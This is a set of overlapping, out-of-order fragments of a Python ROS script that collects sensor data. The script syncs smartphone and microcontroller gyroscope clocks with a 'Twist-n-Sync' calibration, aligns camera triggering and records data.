"print_master('IMUs gathering finished') # Get data from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) -",
"def mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity",
"the first measurement # Get data from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None,",
"+ str(sequence_num)) print_master('Tap Enter to indicate the next sequence') while True: input =",
"\"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording')",
"from src.TimeSync import TimeSync2 import matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt",
"to stop recording along with everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True,",
"mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed to get",
"(start_duration + main_duration + end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu,",
"numpy as np import pandas as pd from io import StringIO from src.TimeSync",
") #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period],",
"[] mcu_imu_time = [] mcu_imu_data = [] depth_cam_ts = None mcu_cam_ts = None",
"+ str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \\ '\\n' ) ''' # Added",
"plt import signal import sys import select import os HOST = None #",
"sys.exit() global HOST HOST = args[1] # Register SIGINT handler def signal_handler(sig, frame):",
"calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M = time_sync2.M",
"''' # Save some info print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print",
"succeeded if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None: print('IMU data calibration failed.",
"sensor_msgs.msg import Imu, CameraInfo, TimeReference import numpy as np import pandas as pd",
"in subpr_list: if subpr is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for",
"data calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M =",
"# Start video on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns /",
"with everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process = True",
"dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq == 1: global",
"'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts) +",
"HOST = args[1] # Register SIGINT handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list =",
"mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args): if len(args) ==",
"',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \\",
"offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0]",
"subpr_list: if subpr is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for p",
"is not None: try: remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting",
"\", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n'",
"# Wait to avoid shaking time.sleep(1) # Gathering MCU and smartphone IMU data",
"sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy()",
"t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path,",
"started. Wait, please') future = executor.submit(remote.get_imu, 1000 * (start_duration + main_duration + end_duration),",
"time_past += time_sleep_duration if time_past == 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister()",
"frame): print_master('Exiting') running_subpr_list = [] for subpr in subpr_list: if subpr is not",
"- mcu_gyro_time[0] + comp_delay2) # Show mean of omegas to visually oversee sync",
"smartphone IP-address. For instance, 10.30.65.166' sys.exit() global HOST HOST = args[1] # Register",
"= subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch launched completely time.sleep(2) while",
"dat.z]) def depth_cam_callback(data): if data.header.seq == 1: global depth_cam_ts depth_cam_ts = data.header.stamp def",
"out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts)",
"time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ =",
"mcu_cam_ts == None or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past",
"M[1,1], 'M12' : M[1,2], 'M20' : M[2,0], 'M21' : M[2,1], 'M22' : M[2,2]",
"get a camera frame and its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset',",
"' + string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR:",
"global HOST HOST = args[1] # Register SIGINT handler def signal_handler(sig, frame): print_master('Exiting')",
"and consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None:",
"'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts],",
"remote remote = RemoteControl(HOST) # Launching ROS data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch",
"# Compute mcu desired timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset ''' # Save",
"if IMU calibration and consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded == False or",
"sequence: ' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence') time.sleep(0.01); #remote.stop_video()",
"performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2)",
"= rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command to mcu via mcu.cpp cam_align_subprocess",
"the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close() #mcu_cam_listener.unregister() #publisher_depth_to_mcu_offset.unregister() if __name__ == '__main__': main(sys.argv)",
"mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args): if len(args) == 1: print 'Please, provide",
"remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote control global remote remote =",
"print_master('Tap Enter to start recording') raw_input() # Start video on s10 sm_remote_ts_ns, sm_frame_period_ns",
"data by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun",
"' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close()",
"= time_sync2.M # Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2",
"- np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show",
"time_sleep_duration if time_past == 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit()",
"TimeReference import numpy as np import pandas as pd from io import StringIO",
"Wait, please') future = executor.submit(remote.get_imu, 1000 * (start_duration + main_duration + end_duration), True,",
"lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length],",
"# Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" +",
"sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns / 1e9 # Compute mcu",
"print_master('Current sequence number: ' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence')",
"data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq == 1: global depth_cam_ts depth_cam_ts",
"= rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process = True sequence_num = 1 print_master('Current sequence",
": [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' : M[0,1], 'M02' : M[0,2], 'M10' :",
"+ end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start",
"def depth_cam_callback(data): if data.header.seq == 1: global depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data):",
"',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \\ '\\n' ) ''' #",
"value = sys.stdin.readline().rstrip() if (value == \"\"): break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync",
"number: ' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence') while True:",
"'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape,",
"Enter to indicate the next sequence') while True: input = select.select([sys.stdin], [], [],",
"mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0]",
"'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' :",
"publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01",
"[p.wait() for p in running_subpr_list] if remote is not None: try: remote.stop_video() except:",
"shaking time.sleep(1) # Gathering MCU and smartphone IMU data with ThreadPoolExecutor(max_workers=1) as executor:",
"+ 'MASTER ERROR: ' + string + bcolors.ENDC) subpr_list = [] mcu_imu_time =",
"from src.RemoteControl import RemoteControl from concurrent.futures import ThreadPoolExecutor import subprocess import rospy from",
"in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts",
"Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0]",
"mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as",
"from concurrent.futures import ThreadPoolExecutor import subprocess import rospy from sensor_msgs.msg import Imu, CameraInfo,",
"comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) # Show mean of omegas",
"= data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq == 1: global depth_cam_ts",
"'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts'",
"the next sequence') while True: input = select.select([sys.stdin], [], [], 0.01)[0] if input:",
"= mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording') raw_input() #",
"msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg)",
"Enter to indicate the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close() #mcu_cam_listener.unregister() #publisher_depth_to_mcu_offset.unregister() if __name__",
"= pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() /",
"data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to",
"mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt import signal import sys import select import",
"mean of omegas to visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time",
"launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M = time_sync2.M # Compute resulting offset",
"\\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time,",
"[] mcu_imu_data = [] depth_cam_ts = None mcu_cam_ts = None mcu_cam_ts_common = None",
"handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list = [] for subpr in subpr_list: if",
"'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2],",
"is started')#\\nPress Ctrl+C to stop recording along with everything and exit') publisher_indicator =",
"of the first measurement # Get data from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)),",
"plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close()",
"Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister()",
"str(comp_delay2) + ',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset)",
"depth_cam_callback(data): if data.header.seq == 1: global depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if",
"The smartphone's IP address class bcolors: HEADER = '\\033[95m' OKBLUE = '\\033[94m' OKCYAN",
"= '\\033[95m' OKBLUE = '\\033[94m' OKCYAN = '\\033[96m' OKGREEN = '\\033[92m' WARNING =",
"global depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01 time_past = 0 while mcu_cam_ts ==",
"'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) # Phase alignment align_camera_subprocess =",
"TimeSync2 import matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt import signal import",
"if (value == \"\"): break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration = 1",
"queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01 time_past = 0 while mcu_cam_ts",
"to indicate the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close() #mcu_cam_listener.unregister() #publisher_depth_to_mcu_offset.unregister() if __name__ ==",
"subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to stop recording along with everything and",
"except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote control global remote",
"= sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize lengths min_length",
"+ comp_delay2) # Show mean of omegas to visually oversee sync performance plt.ion()",
"mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU calibration and consequently",
"is None: print('IMU data calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 =",
"= data.header.stamp def main(args): if len(args) == 1: print 'Please, provide smartphone IP-address.",
"subpr_list = [] mcu_imu_time = [] mcu_imu_data = [] depth_cam_ts = None mcu_cam_ts",
"4 end_duration = 4 # Wait to avoid shaking time.sleep(1) # Gathering MCU",
"publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp",
"depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if data.header.seq == 12: global mcu_cam_ts mcu_cam_ts",
"# Show the problem of the first measurement # Get data from s10",
"mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration",
"print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time",
"print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print",
": M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #",
"mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client",
"mcu_gyro_time[0] + comp_delay2) # Show mean of omegas to visually oversee sync performance",
"time_sync2.M # Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset",
"os HOST = None # The smartphone's IP address class bcolors: HEADER =",
"info print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print",
"completely time.sleep(2) while True: print_master('Tap Enter to start Twist-n-Sync alignment process') input =",
"= remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns / 1e9 #",
"print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: ' + string + bcolors.ENDC) def",
"offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() #",
"args[1] # Register SIGINT handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list = [] for",
"[sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' : M[0,1], 'M02' : M[0,2], 'M10' : M[1,0],",
"TimeReference, latch=True, queue_size=10) #flag_to_process = True sequence_num = 1 print_master('Current sequence number: '",
"data.header.seq == 1: global depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if data.header.seq ==",
"= '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T)",
"# Some time needed to get a camera frame and its info in",
"'M00' : M[0,0], 'M01' : M[0,1], 'M02' : M[0,2], 'M10' : M[1,0], 'M11'",
"sequence_num += 1 print_master('Current sequence: ' + str(sequence_num)) print_master('Tap Enter to indicate the",
"mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset",
"and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process = True sequence_num =",
"pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset'",
"}).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) # Phase alignment",
"enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering finished') # Get",
"or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past == 3: print('Timeout",
"string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: ' +",
"to mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time",
"+ ',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) +",
"= np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200])",
"#mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0]",
"frame data by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess =",
"signal_handler(sig, frame): print_master('Exiting') running_subpr_list = [] for subpr in subpr_list: if subpr is",
"out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ',' + str(sm_remote_ts) + ',' +",
"started')#\\nPress Ctrl+C to stop recording along with everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts',",
"= str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence: ' + str(sequence_num)) print_master('Tap Enter",
"IP-address. For instance, 10.30.65.166' sys.exit() global HOST HOST = args[1] # Register SIGINT",
"#sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) # Show mean of omegas to",
"data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch launched completely time.sleep(2) while True: print_master('Tap Enter",
"M[2,0], 'M21' : M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join(",
"in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem of the first",
"= future.result() print_master('IMUs gathering finished') # Get data from mcu imu mcu_gyro_data =",
"and smartphone IMU data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started. Wait, please')",
"np import pandas as pd from io import StringIO from src.TimeSync import TimeSync2",
"concurrent.futures import ThreadPoolExecutor import subprocess import rospy from sensor_msgs.msg import Imu, CameraInfo, TimeReference",
"sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize lengths min_length =",
"sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0])",
"'M20' : M[2,0], 'M21' : M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ),",
"mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args): if len(args)",
"0 while mcu_cam_ts == None or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past += time_sleep_duration",
"+ str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed to get camrera frame data by",
"executor.submit(remote.get_imu, 1000 * (start_duration + main_duration + end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener",
": M[1,0], 'M11' : M[1,1], 'M12' : M[1,2], 'M20' : M[2,0], 'M21' :",
"sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time,",
":3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize lengths min_length = min(sm_gyro_time.shape[0],",
"if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None: print('IMU data calibration failed. Exiting')",
"select.select([sys.stdin], [], [], 0.01)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"):",
"rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process = True sequence_num = 1 print_master('Current sequence number:",
"Wait to avoid shaking time.sleep(1) # Gathering MCU and smartphone IMU data with",
"bcolors.ENDC) subpr_list = [] mcu_imu_time = [] mcu_imu_data = [] depth_cam_ts = None",
"= rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01 time_past",
"print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1]",
"IMU data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started. Wait, please') future =",
"rospy from sensor_msgs.msg import Imu, CameraInfo, TimeReference import numpy as np import pandas",
"remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M = time_sync2.M # Compute resulting",
"# Added for debugging path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame",
"import subprocess import rospy from sensor_msgs.msg import Imu, CameraInfo, TimeReference import numpy as",
"#imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data,",
"'/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False",
"data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv')",
"np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the",
"np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) #",
"data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join(",
"mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data record_subprocess = subprocess.Popen(('rosrun",
"data.header.stamp def main(args): if len(args) == 1: print 'Please, provide smartphone IP-address. For",
"mcu_cam_ts = None mcu_cam_ts_common = None remote = None def mcu_imu_callback(data): dat =",
"(value == \"\"): break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration = 1 main_duration",
"[], [], 2)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"): break",
"first measurement # Get data from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False)",
"\"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num +=",
"index=False) # Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait()",
"sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns / 1e9",
"M[0,2], 'M10' : M[1,0], 'M11' : M[1,1], 'M12' : M[1,2], 'M20' : M[2,0],",
